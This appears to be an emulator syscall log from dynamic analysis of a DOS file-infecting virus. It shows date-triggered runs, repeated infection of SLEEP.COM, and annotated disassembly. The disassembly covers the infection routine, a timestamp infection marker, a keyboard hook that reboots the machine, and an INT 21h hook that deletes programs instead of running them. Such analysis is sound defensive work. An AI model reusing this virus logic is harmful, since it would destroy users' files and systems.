2018-12-25T12:35:58.851493144Z 87 PC: 12b06 | Get or set file date and time
2018-12-25T12:35:58.853591479Z 62 PC: 12b0a | Close file
2018-12-25T12:35:58.862093806Z 67 PC: 12b19 | Get or set file attributes
2018-12-25T12:35:58.872188121Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:58.875441895Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:58.891996098Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:58.896303595Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:58.902863536Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:58.904259474Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:58.906595585Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:58.910490047Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:58.911895657Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:58.914019075Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:58.915799675Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:58.92406658Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:58.936484171Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:58.93913516Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:58.949374909Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:58.955693368Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:58.961756217Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:58.963621024Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:58.970583342Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:58.982412505Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:58.984513668Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:58.990928405Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:58.992293187Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.000744222Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.014295391Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.021150704Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.114490133Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.121706682Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.128045321Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.130276714Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.132681915Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.135557895Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.137584646Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.144541115Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.146294696Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.236855212Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.357342254Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.3605225Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.568074083Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.575119315Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.581391613Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.582822647Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.585425639Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.588399729Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.589812534Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.592751289Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.594052353Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.613477574Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.633198538Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.635654638Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.6532702Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.660613782Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.671334461Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.67347675Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.677183195Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.687925121Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.68992791Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.697908153Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.699758084Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.707955659Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.719162298Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.722839116Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.732707923Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.740306809Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.747174988Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.748851865Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.752184939Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.75520628Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.756579108Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.759799376Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.761935079Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.769324268Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.779379779Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.783084292Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.793283789Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.80002727Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.807573951Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.809211464Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.811805516Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.821035502Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.822660749Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.829297451Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.832075974Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.839854798Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.849653311Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.853845503Z 42 PC: 12b1f | Get date 0x12b1f: cmp dl, 1
0x12b22: je 0x12b26
0x12b24: jmp 0x12b8d
0x12b26: mov ah, 9
0x12b28: lea dx, word ptr [bp + 0x2a9]
0x12b2c: int 0x21
0x12b2e: jmp 0x12b5a
0x12b30: push ax
0x12b31: in al, 0x60
0x12b33: cmp al, 0x53
0x12b35: je 0x12b3d
0x12b37: pop ax
0x12b38: ljmp ptr cs:[0x2cd]
0x12b3d: ljmp 0xffff:0
0x12b42: iret
0x12b43: cmp ax, 0x4b00
0x12b46: jne 0x12b4c
0x12b48: mov ah, 0x41
0x12b4a: int 0x21
0x12b4c: cmp ax, 0x4b9f
2018-12-25T12:35:59.856579465Z 26 PC: 12b96 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12688,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:35:58.802750483Z 26 PC: 12a82 | Set disk transfer address
2018-12-25T12:35:58.804112339Z 78 PC: 12a8d | Find first file
2018-12-25T12:35:58.810286151Z 67 PC: 12aad | Get or set file attributes
2018-12-25T12:35:58.834557118Z 61 PC: 12ab6 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:35:58.841336453Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:35:58.854716657Z 66 PC: 12aca | Move file pointer
2018-12-25T12:35:58.85672383Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-25T12:35:58.859981593Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-25T12:35:58.871546185Z 66 PC: 12ae8 | Move file pointer
2018-12-25T12:35:58.87686625Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:35:58.885211165Z 87 PC: 12b06 | Get or set file date and time
2018-12-25T12:35:58.888807728Z 62 PC: 12b0a | Close file
2018-12-25T12:35:58.897770867Z 67 PC: 12b19 | Get or set file attributes
2018-12-25T12:35:58.90882815Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:58.912867402Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:58.92439442Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:58.932005322Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:58.939501072Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:58.941975247Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:58.945660435Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:58.949308419Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:58.952421741Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:58.955723497Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:58.957744766Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:58.967367208Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:58.978583653Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:58.981929955Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:58.994104335Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.002152384Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.009917697Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.01200621Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.027771764Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.037639506Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.039977924Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.05018517Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.051974238Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.0607807Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.072261694Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.075328261Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.086214698Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.095098057Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.102506464Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.104453293Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.108252415Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.115473089Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.117203135Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.121172151Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.122973486Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.132449141Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.159304618Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.164104946Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.175459732Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.1828298Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.190119044Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.191672215Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.195376248Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.199112173Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.200577542Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.204057123Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.209000743Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.217311222Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.22843805Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.233417932Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.244422858Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.251746494Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.259680063Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.261416186Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.264177822Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.274934257Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.27670491Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.284295181Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.286696538Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.295726957Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.307274357Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.310736124Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.33018394Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.337817583Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.345313435Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.347439814Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.350072325Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.352955055Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.355126505Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.358133038Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.35980058Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.368536204Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.380052391Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.382854039Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.395162672Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.402696658Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.405679878Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.408483784Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.411551015Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.421428535Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.424345612Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.432004618Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.434919425Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.444922007Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.456223318Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.459202918Z 42 PC: 12b1f | Get date 0x12b1f: cmp dl, 1
; Disassembly window from the date-triggered payload. Its first instruction (0x12b1f: cmp dl, 1) is printed on the preceding log line,
; directly after "Get date", so DL is presumably the day of month returned by that call.
; Linear disassembly: 0x12b30-0x12b4c sit between the jmp at 0x12b2e and its target and look like resident handler bodies, not fall-through code.
0x12b22: je 0x12b26  ; day value == 1 -> run the payload setup
0x12b24: jmp 0x12b8d  ; otherwise skip it
0x12b26: mov ah, 9  ; AH=09h display '$'-terminated string
0x12b28: lea dx, word ptr [bp + 0x2a9]  ; DX -> message at bp+0x2a9
0x12b2c: int 0x21  ; logged as Display string 'Bad command or filename' (PC 12b2e)
0x12b2e: jmp 0x12b5a  ; jump over the bytes below; the log then shows get/set interrupt vector calls from 0x12b5f onward
0x12b30: push ax  ; presumably the entry of the handler installed on vector 9 (keyboard IRQ) — confirm against the set-vector call, which is outside this window
0x12b31: in al, 0x60  ; read the scancode from keyboard data port 0x60
0x12b33: cmp al, 0x53  ; 0x53 is the make code of the Delete / keypad '.' key
0x12b35: je 0x12b3d  ; that key -> reset path
0x12b37: pop ax  ; any other key: restore AX
0x12b38: ljmp ptr cs:[0x2cd]  ; chain through the far pointer stored at cs:0x2cd (presumably the saved original handler — confirm)
0x12b3d: ljmp 0xffff:0  ; far jump to FFFF:0000, the PC reset entry point, i.e. the machine restarts
0x12b42: iret  ; not reached by fall-through after the far jump; role not visible in this window
0x12b43: cmp ax, 0x4b00  ; presumably the entry of the INT 21h hook: is this a DOS EXEC (load and execute) request?
0x12b46: jne 0x12b4c  ; no -> continue with the next check
0x12b48: mov ah, 0x41  ; rewrite the request to AH=41h delete file; DS:DX is left unchanged, so it still points at the program path passed to EXEC
0x12b4a: int 0x21  ; issue the delete: the program being launched is removed instead of executed
0x12b4c: cmp ax, 0x4b9f  ; compares AX with a non-standard value; the window ends here, possibly a residency self-check — confirm
2018-12-25T12:35:59.462198245Z 9 PC: 12b2e | Display string (String= 'Bad command or filename')
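2018-12-25T12:35:59.464678187Z 53 PC: 12b5f | Get interrupt vector (Interrupt = '9' AKA 'Display string') [the AKA label is misleading: vector 9 is INT 09h, the keyboard hardware interrupt; 'Display string' is INT 21h function 09h]
2018-12-25T12:35:59.465841374Z 37 PC: 12b71 | Set interrupt vector (Interrupt = '9' AKA 'Display string') [replaces the INT 09h keyboard handler; the AKA label is the same INT 21h function-name mix-up]
2018-12-25T12:35:59.467413348Z 53 PC: 12b76 | Get interrupt vector (Interrupt = '33' AKA 'Random read') [the AKA label is misleading: vector 33 decimal is INT 21h, the DOS services interrupt; 'Random read' is INT 21h function 21h]
2018-12-25T12:35:59.468756866Z 37 PC: 12b88 | Set interrupt vector (Interrupt = '33' AKA 'Random read') [replaces the INT 21h DOS services handler; the AKA label is the same INT 21h function-name mix-up]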
2018-12-25T12:35:59.469802165Z 49 PC: 12b8d | Terminate and stay resident (Return code = '0' | Memory size = '34')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12688,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:35:58.806703654Z 26 PC: 12a82 | Set disk transfer address
2018-12-25T12:35:58.80870298Z 78 PC: 12a8d | Find first file
2018-12-25T12:35:58.816741165Z 67 PC: 12aad | Get or set file attributes
2018-12-25T12:35:58.841532061Z 61 PC: 12ab6 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:35:58.85403108Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:35:58.864239658Z 66 PC: 12aca | Move file pointer
2018-12-25T12:35:58.866132946Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
; Disassembly window from the file-infection routine. Its first instruction (0x12ad9) is printed on the preceding log line.
; The "PC" values in the syscall log are the return addresses of the int 0x21 calls below (0x12ae8, 0x12af3, 0x12b06, 0x12b0a).
; File artefacts visible here: a 458-byte write, a 3-byte rewrite at offset 0, and a timestamp whose seconds field is forced to 0x15.
0x12add: call 0x22a4b  ; the "Write 458 bytes" event (PC 12a59) is logged between this call and 0x12ae8, so this presumably reaches the routine that writes the body; the printed target 0x22a4b looks like a 16-bit wrap artefact of the disassembler — confirm
0x12ae0: cdq  ; one-byte opcode (next instruction is at 0x12ae1); in 16-bit code this encoding is CWD (DX = sign-extension of AX) — presumably leaves DX = 0 here, confirm
0x12ae1: sub cx, cx  ; CX = 0 (high word of the seek offset)
0x12ae3: mov ax, 0x4200  ; AH=42h move file pointer, AL=00h = offset measured from start of file
0x12ae6: int 0x21  ; logged as "Move file pointer" (PC 12ae8); seeks to offset 0 if DX was cleared above
0x12ae8: lea dx, word ptr [bp + 0x2ca]  ; DX -> 3-byte buffer at bp+0x2ca
0x12aec: mov cx, 3  ; byte count = 3
0x12aef: mov ah, 0x40  ; AH=40h write to file or device
0x12af1: int 0x21  ; logged as "Write 3 bytes on handle 5": overwrites the first 3 bytes of the .COM file (presumably with a jump to the written body — confirm)
0x12af3: mov dx, word ptr [bp + 0x2ed]  ; DX = date word for function 5701h; presumably the date saved from the find-file record — confirm
0x12af7: mov cx, word ptr [bp + 0x2eb]  ; CX = time word for function 5701h
0x12afb: and cl, 0xe0  ; clear bits 0-4 of the time word (the seconds/2 field), keep the low minute bits
0x12afe: or cl, 0x15  ; force seconds/2 = 0x15 (21, i.e. 42 s); looks like an already-infected marker — confirm against the check earlier in the routine
0x12b01: mov ax, 0x5701  ; AH=57h, AL=01h = set file date and time
0x12b04: int 0x21  ; logged as "Get or set file date and time" (PC 12b06)
0x12b06: mov ah, 0x3e  ; AH=3Eh close file
0x12b08: int 0x21  ; logged as "Close file" (PC 12b0a)
0x12b0a: lea dx, word ptr [bp + 0x2f3]  ; DX -> bp+0x2f3; the offsets 0x2eb/0x2ed/0x2f3 are consistent with the time/date/name fields of a DTA at bp+0x2d5 — confirm
0x12b0e: sub cx, cx  ; CX = 0; the next logged event is "Get or set file attributes" (PC 12b19), but the window ends before that call
2018-12-25T12:35:58.869214621Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-25T12:35:58.882135943Z 66 PC: 12ae8 | Move file pointer
2018-12-25T12:35:58.885291645Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:35:58.893448414Z 87 PC: 12b06 | Get or set file date and time
2018-12-25T12:35:58.895856135Z 62 PC: 12b0a | Close file
2018-12-25T12:35:58.904467557Z 67 PC: 12b19 | Get or set file attributes
2018-12-25T12:35:58.915782581Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:58.920317995Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:58.935177525Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:58.942802671Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:58.950768102Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:58.95421377Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:58.956929886Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:58.960211916Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:58.969594234Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:58.973489185Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:58.97552342Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:58.984655653Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:58.995841868Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:58.999021512Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.011844003Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.019793931Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.027893612Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.03027725Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.032836178Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.042092168Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.043896752Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.051254976Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.05321354Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.061493183Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.068673735Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.071859486Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.083729845Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.092816256Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.100633063Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.102656206Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.106857688Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.110617672Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.112563859Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.116800318Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.119201494Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.127905874Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.140133424Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.143485424Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.158996675Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.168340454Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.176106477Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.17771033Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.180578403Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.185347728Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.187556095Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.19244322Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.196255294Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.205574722Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.217885581Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.222284255Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.234860762Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.242935703Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.251674617Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.254065445Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.257149501Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.267359798Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.270641864Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.278499536Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.280647878Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.291038615Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.303042121Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.306454788Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.318781738Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.327053647Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.334666023Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.337449488Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.341195682Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.345109777Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.347247441Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.351377141Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.35366023Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.362969252Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.377977437Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.381671004Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.392970452Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.401206713Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.40457357Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.406788953Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.410720674Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.42055146Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.422778544Z 64 PC: 12af3 | Write file or device (See above)
